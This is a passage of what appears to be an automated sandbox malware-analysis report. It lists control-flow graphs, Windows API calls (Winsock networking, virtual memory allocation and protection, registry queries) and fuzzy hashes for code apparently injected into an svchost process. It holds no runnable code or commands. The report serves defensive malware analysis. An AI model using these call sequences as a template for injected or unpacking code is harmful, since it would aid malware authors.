free 12935->12937 12938 4d86220 12935->12938 12936->12925 12940 4d861fc 12937->12940 12938->12936 12939 4d86245 free 12938->12939 12941 4d861bb __cfltcvt free 12938->12941 12939->12936 12942 4d7f848 _mbstowcs_s free 12940->12942 12941->12938 12943 4d86205 12942->12943 12944 4d7f848 _mbstowcs_s free 12943->12944 12945 4d8620e 12944->12945 12946 4d861bb __cfltcvt free 12945->12946 12947 4d86217 12946->12947 12948 4d7f848 _mbstowcs_s free 12947->12948 12948->12938 12950 4d74a06 free 12949->12950 12951 4d74a11 12949->12951 12950->12951 12951->12859 12953 4d7a4e5 12952->12953 12961 4d7a502 12952->12961 12954 4d7a570 abort 12953->12954 12955 4d7a507 12953->12955 12956 4d7a510 12953->12956 12957 4d7a4fb 12953->12957 12953->12961 12959 4d7cd86 closesocket 12955->12959 12960 4d7cbd9 12 API calls 12956->12960 12958 4d7bb4c 5 API calls 12957->12958 12958->12961 12959->12961 12960->12961 12961->12864 14153 4d7992a SetErrorMode 14154 4d7993a 14153->14154 14155 4d7bf7a WSAStartup 14154->14155 14170 4d7bd3a memset htons inet_addr 14155->14170 14157 4d7bfa9 14171 4d7bd81 memset htons 14157->14171 14160 4d7bff2 getsockopt 14162 4d7c017 14160->14162 14163 4d7c021 closesocket 14160->14163 14161 4d7c02a WSAGetLastError 14165 4d7c036 14161->14165 14162->14163 14164 4d7c037 socket 14163->14164 14166 4d7c07c WSAGetLastError 14164->14166 14167 4d7c048 closesocket 14164->14167 14165->14164 14168 4d7c088 14166->14168 14167->14168 14170->14157 14172 4d7a59e 4 API calls 14171->14172 14173 4d7bdba socket 14172->14173 14173->14160 14173->14161

Control-flow Graph

APIs
• memset.MSVCRT ref: 04D7B06C
• memset.MSVCRT ref: 04D7B0B8
• WSARecv.WS2_32(FFE0458D,00000000,00000001,?,00000000,04D728E9,00000000), ref: 04D7B0E6
• GetLastError.KERNEL32(?,?,?,?,?,00000001), ref: 04D7B110
• WSAGetLastError.WS2_32(?,?,?,?,?,00000001), ref: 04D7B11D
• WSAGetLastError.WS2_32(?,?,?,?,?,00000001), ref: 04D7B127
• WSAGetLastError.WS2_32(?,?,?,?,?,00000001), ref: 04D7B12F
• RegisterWaitForSingleObject.KERNEL32(04D72909,30C48300,04D7AF9E,04D728D9,000000FF,00000004), ref: 04D7B179
Memory Dump Source
• Source File: 00000014.00000002.3019478083.0000000004D71000.00000020.00001000.00020000.00000000.sdmp, Offset: 04D71000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_20_2_4d71000_svchost.jbxd
Similarity
• API ID: ErrorLast$memset$ObjectRecvRegisterSingleWait
• String ID:
• API String ID: 2020750497-0
• Opcode ID: ea1f4e3be071ea27efcb8f8deb0ab93eeeb2c9faaa7f85fa5bbc92254c388f84
• Instruction ID: 1dd7fd0398371deb22a367135dfd48dfb438ac861f8c521531d1d287b2817244
• Opcode Fuzzy Hash: ea1f4e3be071ea27efcb8f8deb0ab93eeeb2c9faaa7f85fa5bbc92254c388f84
• Instruction Fuzzy Hash: 66418E31600605BFE7219F24CC45BAABBF8FF04358F10496AE996D6690E774F914DB90

Control-flow Graph

control_flow_graph 133 4d7ab70-4d7ab7c 134 4d7abe7-4d7abf9 bind 133->134 135 4d7ab7e-4d7ab90 socket 133->135 136 4d7ac11-4d7ac15 134->136 137 4d7abfb-4d7ac08 WSAGetLastError 134->137 138 4d7ab92 WSAGetLastError 135->138 139 4d7aba8-4d7abb5 SetHandleInformation 135->139 142 4d7ac17-4d7ac1a 136->142 140 4d7ac0a-4d7ac0e 137->140 141 4d7ab98-4d7aba2 call 4d7bd00 137->141 138->141 143 4d7abb7-4d7abc7 GetLastError call 4d7bd00 139->143 144 4d7abd1-4d7abdb call 4d7ac1b 139->144 140->136 151 4d7aba3-4d7aba6 141->151 152 4d7abc8-4d7abcf closesocket 143->152 150 4d7abe0-4d7abe5 144->150 150->134 150->152 151->142 152->151
APIs
• socket.WS2_32(00000010,00000001,00000000), ref: 04D7AB85
• WSAGetLastError.WS2_32(?,?,?,04D7AB6C,04D7BDF5,00000002,04D7BDF5,00000010,04D7BDF5,04D7BE72), ref: 04D7AB92
  • Part of subcall function 04D7AC1B: ioctlsocket.WS2_32(04D7BDF5,8004667E,04D7BE72), ref: 04D7AC36
  • Part of subcall function 04D7AC1B: WSAGetLastError.WS2_32(?,?,04D7ABE0,17E80870,04D7BDF5,00000000,00000010,00000000,?,?,?,04D7AB6C,04D7BDF5,00000002,04D7BDF5,00000010), ref: 04D7AC41
• SetHandleInformation.KERNEL32(00000000,00000001,00000000,?,?,?,04D7AB6C,04D7BDF5,00000002,04D7BDF5,00000010,04D7BDF5,04D7BE72), ref: 04D7ABAD
• GetLastError.KERNEL32(?,?,?,04D7AB6C,04D7BDF5,00000002,04D7BDF5,00000010,04D7BDF5,04D7BE72), ref: 04D7ABB7
• closesocket.WS2_32(00000000), ref: 04D7ABC9
• bind.WS2_32(50A5A5A5,04D7BDF5,00000002), ref: 04D7ABF0
• WSAGetLastError.WS2_32(?,?,?,04D7AB6C,04D7BDF5,00000002,04D7BDF5,00000010,04D7BDF5,04D7BE72), ref: 04D7ABFB
Memory Dump Source
• Source File: 00000014.00000002.3019478083.0000000004D71000.00000020.00001000.00020000.00000000.sdmp, Offset: 04D71000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_20_2_4d71000_svchost.jbxd
Similarity
• API ID: ErrorLast$HandleInformationbindclosesocketioctlsocketsocket
• String ID:
• API String ID: 2417539845-0
• Opcode ID: c9136705f1b80664106fb729e0e04d7a0b163efb6808b252258dd27afe0a14c5
• Instruction ID: 9ca19d0064a9ed401d0fb534ad5f2a3e30275192c845ed0d13b5f29b3aa6a2da
• Opcode Fuzzy Hash: c9136705f1b80664106fb729e0e04d7a0b163efb6808b252258dd27afe0a14c5
                                                                                                                                                            • Instruction Fuzzy Hash: 6A119031300600BBDB251E70EC08B6E3BA6FB41735F108A19F66AD02E0EB35BC50DA61

                                                                                                                                                            Control-flow Graph

                                                                                                                                                            APIs
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000014.00000002.3019478083.0000000004D71000.00000020.00001000.00020000.00000000.sdmp, Offset: 04D71000, based on PE: false
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_20_2_4d71000_svchost.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: callocfree$memsetstrlen$sprintfsrandtime
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 2846687148-0
                                                                                                                                                            • Opcode ID: caa86e440c245f5eed9be78647423903edae714b45d50a8acbf1c9d95c26e516
                                                                                                                                                            • Instruction ID: c84066408917861792098bb2848735719549a73f2fbaf3d4fe3b5e031981a2ba
                                                                                                                                                            • Opcode Fuzzy Hash: caa86e440c245f5eed9be78647423903edae714b45d50a8acbf1c9d95c26e516
                                                                                                                                                            • Instruction Fuzzy Hash: 7B715DB1A40705EFEB21DFA5D885AAEBBF8FF08304F10456EE959D6640E734A944CF60
                                                                                                                                                            APIs
                                                                                                                                                            • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004,00000000,?,?), ref: 00350326
                                                                                                                                                              • Part of subcall function 003500A4: VirtualAlloc.KERNELBASE(00000000,00001012,00001000,00000004), ref: 003500CD
                                                                                                                                                              • Part of subcall function 003500A4: VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 00350279
                                                                                                                                                            • VirtualAlloc.KERNELBASE(00000000,00400000,00001000,00000004), ref: 00350378
                                                                                                                                                            • VirtualProtect.KERNELBASE(0000002C,?,00000040,?), ref: 003503E7
                                                                                                                                                            • VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 00350407
                                                                                                                                                            • MapViewOfFile.KERNELBASE(?,00000004,00000000,00000000,00000000), ref: 0035042E
                                                                                                                                                            • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004), ref: 00350456
                                                                                                                                                            • CloseHandle.KERNELBASE(?), ref: 00350471
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000014.00000003.2329135729.0000000000350000.00000040.00000001.00020000.00000000.sdmp, Offset: 00350000, based on PE: false
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_20_3_350000_svchost.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: Virtual$Alloc$Free$CloseFileHandleProtectView
                                                                                                                                                            • String ID: ,
                                                                                                                                                            • API String ID: 3867569247-3772416878
                                                                                                                                                            • Opcode ID: 35eb397ea14406336b01ea38f36e06f8461e94550e7b98cd084062937234d485
                                                                                                                                                            • Instruction ID: c840cdd39ce14b6b0df787053643e1ab2889fdac35f2c2c444f6e15d1c6e7439
                                                                                                                                                            • Opcode Fuzzy Hash: 35eb397ea14406336b01ea38f36e06f8461e94550e7b98cd084062937234d485
                                                                                                                                                            • Instruction Fuzzy Hash: C7613DB5900209EFCB25DFA5C985EEEBBB9FF08351F108419FA59AB250D731A944CF60

                                                                                                                                                            Control-flow Graph

                                                                                                                                                            APIs
                                                                                                                                                            • SetErrorMode.KERNELBASE(00008003), ref: 04D7992F
                                                                                                                                                            • WSAStartup.WS2_32(00000202,?), ref: 04D7BF91
                                                                                                                                                              • Part of subcall function 04D7BD3A: memset.MSVCRT ref: 04D7BD4A
                                                                                                                                                              • Part of subcall function 04D7BD3A: htons.WS2_32(00000002), ref: 04D7BD5B
                                                                                                                                                              • Part of subcall function 04D7BD3A: inet_addr.WS2_32(?), ref: 04D7BD68
                                                                                                                                                              • Part of subcall function 04D7BD81: memset.MSVCRT ref: 04D7BD91
                                                                                                                                                              • Part of subcall function 04D7BD81: htons.WS2_32(?), ref: 04D7BDA2
                                                                                                                                                            • socket.WS2_32(00000002,00000001,00000000), ref: 04D7BFDE
                                                                                                                                                            • getsockopt.WS2_32(00000000,0000FFFF,00002005,?,?), ref: 04D7C00F
                                                                                                                                                            • closesocket.WS2_32(00000000), ref: 04D7C022
                                                                                                                                                            • WSAGetLastError.WS2_32 ref: 04D7C02A
                                                                                                                                                            • socket.WS2_32(00000017,00000001,00000000), ref: 04D7C03F
                                                                                                                                                            • closesocket.WS2_32(00000000), ref: 04D7C074
                                                                                                                                                            • WSAGetLastError.WS2_32 ref: 04D7C07C
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000014.00000002.3019478083.0000000004D71000.00000020.00001000.00020000.00000000.sdmp, Offset: 04D71000, based on PE: false
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_20_2_4d71000_svchost.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: Error$Lastclosesockethtonsmemsetsocket$ModeStartupgetsockoptinet_addr
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 2777411211-0
                                                                                                                                                            • Opcode ID: 2b011e0e62591dd9499b2cedbaccc601c39f5fdcd2b21441b07f00d685f5edee
                                                                                                                                                            • Instruction ID: 0465bfc2511a38c7f7aba1da6521b66e3629542a33648904cad59353778c5caa
                                                                                                                                                            • Opcode Fuzzy Hash: 2b011e0e62591dd9499b2cedbaccc601c39f5fdcd2b21441b07f00d685f5edee
                                                                                                                                                            • Instruction Fuzzy Hash: 6D31DB72304304BFE610AE64DC49F6B769CEB45764F40095AF609D62C0FB74AC09CBA1

                                                                                                                                                            Control-flow Graph

                                                                                                                                                            APIs
                                                                                                                                                            • memset.MSVCRT ref: 04D7B49F
                                                                                                                                                            • memset.MSVCRT ref: 04D7B4AB
                                                                                                                                                            • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,04D750A3,00000000,00000000,04D7505E,00000000), ref: 04D7B4BD
                                                                                                                                                            • WSASend.WS2_32(?,04D750A3,?,00000000,00000000,00000010,00000000), ref: 04D7B4E2
                                                                                                                                                            • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 04D7B53B
                                                                                                                                                            • WSAGetLastError.WS2_32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 04D7B548
                                                                                                                                                            • RegisterWaitForSingleObject.KERNEL32(00000048,?,04D7B60D,00000000,000000FF,0000000C), ref: 04D7B5D4
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000014.00000002.3019478083.0000000004D71000.00000020.00001000.00020000.00000000.sdmp, Offset: 04D71000, based on PE: false
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_20_2_4d71000_svchost.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: ErrorLastmemset$CreateEventObjectRegisterSendSingleWait
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 2712206520-0
                                                                                                                                                            • Opcode ID: ed1f69759fc9846d14fe70fe355f8a9b7a05a3a4322dc7bb6090fd7b5e4ba7a2
                                                                                                                                                            • Instruction ID: 3723f4b32e77ac7842a0d06eec2f543d7a12a91bab0bf6b93ff7a56409f3964b
                                                                                                                                                            • Opcode Fuzzy Hash: ed1f69759fc9846d14fe70fe355f8a9b7a05a3a4322dc7bb6090fd7b5e4ba7a2
                                                                                                                                                            • Instruction Fuzzy Hash: 495142B150070AAFDB24CF25C884A66BBF8FF05358B048A5EE956C7A51E734F855CF90

                                                                                                                                                            Control-flow Graph

                                                                                                                                                            APIs
                                                                                                                                                            • GetCurrentProcess.KERNEL32(00000000), ref: 04D74817
                                                                                                                                                              • Part of subcall function 04D7327F: GetModuleHandleA.KERNEL32(04D9615C,04D9616C), ref: 04D73291
                                                                                                                                                              • Part of subcall function 04D7327F: GetProcAddress.KERNEL32(00000000), ref: 04D73298
                                                                                                                                                            • RegOpenKeyExW.KERNELBASE(80000002,04D9635C,00000000,00000001,00000068), ref: 04D7483F
                                                                                                                                                            • RegQueryValueExW.KERNELBASE(00000068,04D96344,00000000,00000000,?,00000000), ref: 04D74865
                                                                                                                                                            • RegCloseKey.KERNELBASE(00000068), ref: 04D7488B
                                                                                                                                                            • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 04D7489D
                                                                                                                                                            • GetVolumeInformationW.KERNELBASE(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 04D748C2
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000014.00000002.3019478083.0000000004D71000.00000020.00001000.00020000.00000000.sdmp, Offset: 04D71000, based on PE: false
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_20_2_4d71000_svchost.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: AddressCloseCurrentDirectoryHandleInformationModuleOpenProcProcessQuerySystemValueVolume
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 3913378182-0
                                                                                                                                                            • Opcode ID: 73d44226224712c3cd61af084414f29dc28d7fa2709cb7ef2f50da538b0138b9
                                                                                                                                                            • Instruction ID: 4c143e5ca73cbb66941b1b808e56032b0115e51b2707fee97723b60e5561c277
                                                                                                                                                            • Opcode Fuzzy Hash: 73d44226224712c3cd61af084414f29dc28d7fa2709cb7ef2f50da538b0138b9
                                                                                                                                                            • Instruction Fuzzy Hash: FA31B2B2A0111CBAEB11DAA1DC49FDF7BBCEF04354F000595B649E2140EA74AB84CBA0

                                                                                                                                                            Control-flow Graph

                                                                                                                                                            APIs
                                                                                                                                                            • ioctlsocket.WS2_32(04D7BDF5,8004667E,04D7BE72), ref: 04D7AC36
                                                                                                                                                            • WSAGetLastError.WS2_32(?,?,04D7ABE0,17E80870,04D7BDF5,00000000,00000010,00000000,?,?,?,04D7AB6C,04D7BDF5,00000002,04D7BDF5,00000010), ref: 04D7AC41
                                                                                                                                                            • CreateIoCompletionPort.KERNELBASE(04D7BDF5,19751710,04D7BDF5,00000000,?,?,04D7ABE0,17E80870,04D7BDF5,00000000,00000010,00000000,?,?,?,04D7AB6C), ref: 04D7AC61
                                                                                                                                                            • SetFileCompletionNotificationModes.KERNEL32(04D7BDF5,00000003,?,?,04D7ABE0,17E80870,04D7BDF5,00000000,00000010,00000000,?,?,?,04D7AB6C,04D7BDF5), ref: 04D7ACA3
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000014.00000002.3019478083.0000000004D71000.00000020.00001000.00020000.00000000.sdmp, Offset: 04D71000, based on PE: false
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_20_2_4d71000_svchost.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: Completion$CreateErrorFileLastModesNotificationPortioctlsocket
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 3397353003-0
                                                                                                                                                            • Opcode ID: 786008a994a19bc0f5f5f85d149398b00491e50218a4ead095afe990a9c4514b
                                                                                                                                                            • Instruction ID: 8174f6a700f0b0636d7d6b9fc40bab116fb0f01ce37a2ba5ccc636860e3384c8
                                                                                                                                                            • Opcode Fuzzy Hash: 786008a994a19bc0f5f5f85d149398b00491e50218a4ead095afe990a9c4514b
                                                                                                                                                            • Instruction Fuzzy Hash: 1231A075200605BBEB269E64DD85B6E7EA8FB80358F148519FA4292380FB75FE40C7A4

                                                                                                                                                            Control-flow Graph

                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000014.00000002.3019478083.0000000004D71000.00000020.00001000.00020000.00000000.sdmp, Offset: 04D71000, based on PE: false
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_20_2_4d71000_svchost.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID:
                                                                                                                                                            • Opcode ID: eb1bcc4fa5b9598324643400270e0c67b5c181880b9fbdb80f86d1e7228ce30c
                                                                                                                                                            • Instruction ID: 64bdfef1ce9ae5d8a342981d595f377fe0ad0f3e5467555c96aef0c127b8ff03
                                                                                                                                                            • Opcode Fuzzy Hash: eb1bcc4fa5b9598324643400270e0c67b5c181880b9fbdb80f86d1e7228ce30c
                                                                                                                                                            • Instruction Fuzzy Hash: C541AEB1601201EFDB14CF15C881BAAB7B8FF05358F04856AEE459F256E734F801CBA0

                                                                                                                                                            Control-flow Graph

                                                                                                                                                            APIs
                                                                                                                                                            • shutdown.WS2_32(D7FF5604,00000001), ref: 04D7BB6F
                                                                                                                                                            • closesocket.WS2_32(?), ref: 04D7BBC5
                                                                                                                                                            • closesocket.WS2_32(D7FF5604), ref: 04D7BC3E
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000014.00000002.3019478083.0000000004D71000.00000020.00001000.00020000.00000000.sdmp, Offset: 04D71000, based on PE: false
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_20_2_4d71000_svchost.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: closesocket$shutdown
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 3079814495-0
                                                                                                                                                            • Opcode ID: 5b6121338fa46cadf5685f39715739bacf2f6ab8b671e2525d0391fed4985eaa
                                                                                                                                                            • Instruction ID: f47872c4d6f757f4717d39d611229a358bc8155d4797a612f47c6890746a154c
                                                                                                                                                            • Opcode Fuzzy Hash: 5b6121338fa46cadf5685f39715739bacf2f6ab8b671e2525d0391fed4985eaa
                                                                                                                                                            • Instruction Fuzzy Hash: B0414F71500B059FEB348E35D945762BBF0FF003A8F548A1FD8A696AA0EB34F946CB51

                                                                                                                                                            Control-flow Graph

                                                                                                                                                            APIs
                                                                                                                                                            • setsockopt.WS2_32(?,0000FFFF,00007010,00000000,00000000), ref: 04D7BAC8
                                                                                                                                                            • WSAGetLastError.WS2_32(?,04D79BAC,00000000,00000000,?,00000000,00000000,00000000,04D79A2D,00000000,?,00000000,04D73488,?,00000000,?), ref: 04D7BAF0
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000014.00000002.3019478083.0000000004D71000.00000020.00001000.00020000.00000000.sdmp, Offset: 04D71000, based on PE: false
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_20_2_4d71000_svchost.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: ErrorLastsetsockopt
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 1729277954-0
                                                                                                                                                            • Opcode ID: fdea7ff6ef092656251672ab10d6f715f4f9b69a9b9a4fef09f7cfb529ac3f77
                                                                                                                                                            • Instruction ID: cfce6ea1d82afc449aaca5438d50634510f99af081ded7beb33c070f908518e2
                                                                                                                                                            • Opcode Fuzzy Hash: fdea7ff6ef092656251672ab10d6f715f4f9b69a9b9a4fef09f7cfb529ac3f77
                                                                                                                                                            • Instruction Fuzzy Hash: 70314D70600706AFDB209F25C884A66B7B8FF09768B008A1AFD5A97741E730F915DBA4
                                                                                                                                                            APIs
                                                                                                                                                            • VirtualAlloc.KERNELBASE(00000000,00001012,00001000,00000004), ref: 003500CD
                                                                                                                                                            • VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 00350279
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000014.00000003.2329135729.0000000000350000.00000040.00000001.00020000.00000000.sdmp, Offset: 00350000, based on PE: false
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_20_3_350000_svchost.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: Virtual$AllocFree
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 2087232378-0
                                                                                                                                                            • Opcode ID: 7dc8e79fde86babc96161718fc4e5f80a5398d7d893a888eaa0e52eee754c683
                                                                                                                                                            • Instruction ID: 06b0fa751ca22934e03c08c142055275a50f2de155840e29e7cd948044b916b3
                                                                                                                                                            • Opcode Fuzzy Hash: 7dc8e79fde86babc96161718fc4e5f80a5398d7d893a888eaa0e52eee754c683
                                                                                                                                                            • Instruction Fuzzy Hash: 0B71CB71E0424ADFCB46CF98C981BEDBBF0AF08315F244495E865FB251C235AA84DF65

                                                                                                                                                            Control-flow Graph

                                                                                                                                                            APIs
                                                                                                                                                            • free.MSVCRT(000443E8,000443E8,0000402D,00000000,?,00000000,04D7505E,04D75127,04D7505E,00000000,04D750C1,?,00000000,04D7505E,00000000,04D75188), ref: 04D7F542
                                                                                                                                                            • strlen.MSVCRT ref: 04D7F5A8
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000014.00000002.3019478083.0000000004D71000.00000020.00001000.00020000.00000000.sdmp, Offset: 04D71000, based on PE: false
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_20_2_4d71000_svchost.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: freestrlen
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 322734593-0
                                                                                                                                                            • Opcode ID: f17bf73664d0007fe241282c84fb602e5d5728dfa2ff23b29a4b25d5cee35c9f
                                                                                                                                                            • Instruction ID: 93f1e93511fa6591c7e317f92e6796548b82266eabc1da5e155edf71a60a7f49
                                                                                                                                                            • Opcode Fuzzy Hash: f17bf73664d0007fe241282c84fb602e5d5728dfa2ff23b29a4b25d5cee35c9f
                                                                                                                                                            • Instruction Fuzzy Hash: 3A215E31304704AFEE31BB39EC44F5BB7E9FF44318B05482DF586A2560EB22F9108A65

                                                                                                                                                            Control-flow Graph

                                                                                                                                                            APIs
                                                                                                                                                            • malloc.MSVCRT ref: 04D7551F
                                                                                                                                                            • memset.MSVCRT ref: 04D75534
                                                                                                                                                              • Part of subcall function 04D7ED4F: memset.MSVCRT ref: 04D7ED5A
                                                                                                                                                              • Part of subcall function 04D7ED63: calloc.MSVCRT(00000001,0000402D,0000017C,?,?,?,04D75573,?,04D97BE8,?,?,?,00000000,00000000,0000017C), ref: 04D7ED86
                                                                                                                                                              • Part of subcall function 04D7F06E: strlen.MSVCRT ref: 04D7F07C
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000014.00000002.3019478083.0000000004D71000.00000020.00001000.00020000.00000000.sdmp, Offset: 04D71000, based on PE: false
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_20_2_4d71000_svchost.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: memset$callocmallocstrlen
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 285299393-0
                                                                                                                                                            • Opcode ID: 7ea7cea8f610c74ca4bddd013c584ffad92f975e2a90fcfadc462f1b1c18e688
                                                                                                                                                            • Instruction ID: a5b1bdfeb926ac1ac328a56e8f252712656246a7f9092dfc6e239f7c881be4ee
                                                                                                                                                            • Opcode Fuzzy Hash: 7ea7cea8f610c74ca4bddd013c584ffad92f975e2a90fcfadc462f1b1c18e688
                                                                                                                                                            • Instruction Fuzzy Hash: 7811E276700301BBEB20AFA4DC46F4BBBA9EF40B44F004819F51997600E771F810CBA1

                                                                                                                                                            Control-flow Graph

                                                                                                                                                            APIs
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000014.00000002.3019478083.0000000004D71000.00000020.00001000.00020000.00000000.sdmp, Offset: 04D71000, based on PE: false
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_20_2_4d71000_svchost.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: freemalloc
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 3061335427-0
                                                                                                                                                            • Opcode ID: cbff4eb4fad1dea9a878228d27a44015dbb3ff88c7d3b1f2a17269a60f8bb5f4
                                                                                                                                                            • Instruction ID: 0f60851459249c47edda4171296e9b3beb26020cd93aafb1996927d24eb29b67
                                                                                                                                                            • Opcode Fuzzy Hash: cbff4eb4fad1dea9a878228d27a44015dbb3ff88c7d3b1f2a17269a60f8bb5f4
                                                                                                                                                            • Instruction Fuzzy Hash: 13D05B3320D221BFEA6627747C199DB7B9AEF45365F008896F904C0280FF196D46C6B6

                                                                                                                                                            Control-flow Graph

                                                                                                                                                            APIs
                                                                                                                                                            • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,04D728A5,?,04D7A87B,?,04D728A5,04D728A5,04D753A0,?,04D753D5,04D75421,04D75376,?), ref: 04D7B03E
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000014.00000002.3019478083.0000000004D71000.00000020.00001000.00020000.00000000.sdmp, Offset: 04D71000, based on PE: false
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_20_2_4d71000_svchost.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: CreateEvent
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 2692171526-0

                                                                                                                                                            Control-flow Graph

                                                                                                                                                            • Executed
                                                                                                                                                            • Not Executed
                                                                                                                                                            control_flow_graph 394 4d7ed63-4d7ed8f calloc 395 4d7eda6-4d7edad 394->395 396 4d7ed91-4d7eda4 394->396 397 4d7edc4-4d7ee14 395->397 396->395 400 4d7edaf-4d7edc2 call 4d7ef90 call 4d7ee1d 396->400 405 4d7ee18-4d7ee1c 397->405 400->397 407 4d7ee16 400->407 407->405
                                                                                                                                                            APIs
                                                                                                                                                            • calloc.MSVCRT(00000001,0000402D,0000017C,?,?,?,04D75573,?,04D97BE8,?,?,?,00000000,00000000,0000017C), ref: 04D7ED86
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000014.00000002.3019478083.0000000004D71000.00000020.00001000.00020000.00000000.sdmp, Offset: 04D71000, based on PE: false
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_20_2_4d71000_svchost.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: calloc
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 2635317215-0
                                                                                                                                                            APIs
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000014.00000002.3019478083.0000000004D71000.00000020.00001000.00020000.00000000.sdmp, Offset: 04D71000, based on PE: false
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_20_2_4d71000_svchost.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: malloc
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 2803490479-0
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000014.00000003.2329135729.0000000000350000.00000040.00000001.00020000.00000000.sdmp, Offset: 00350000, based on PE: false
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_20_3_350000_svchost.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID:
                                                                                                                                                            APIs
                                                                                                                                                            • memcmp.MSVCRT(?,04D96FBC,00000001,00000000,?,04D73ABF,?,?), ref: 04D7594F
                                                                                                                                                            • memcmp.MSVCRT(?,04D96FB8,00000002), ref: 04D7597E
                                                                                                                                                            • memcmp.MSVCRT(?,04D96FB4,00000003), ref: 04D759BE
                                                                                                                                                            • memcmp.MSVCRT(?,04D96FA0,00000004), ref: 04D75A53
                                                                                                                                                            • memcmp.MSVCRT(?,04D96F98,00000005), ref: 04D75A97
                                                                                                                                                            • memcmp.MSVCRT(?,04D96F70,00000006), ref: 04D75B55
                                                                                                                                                            • memcmp.MSVCRT(?,04D96F58,00000007), ref: 04D75BD1
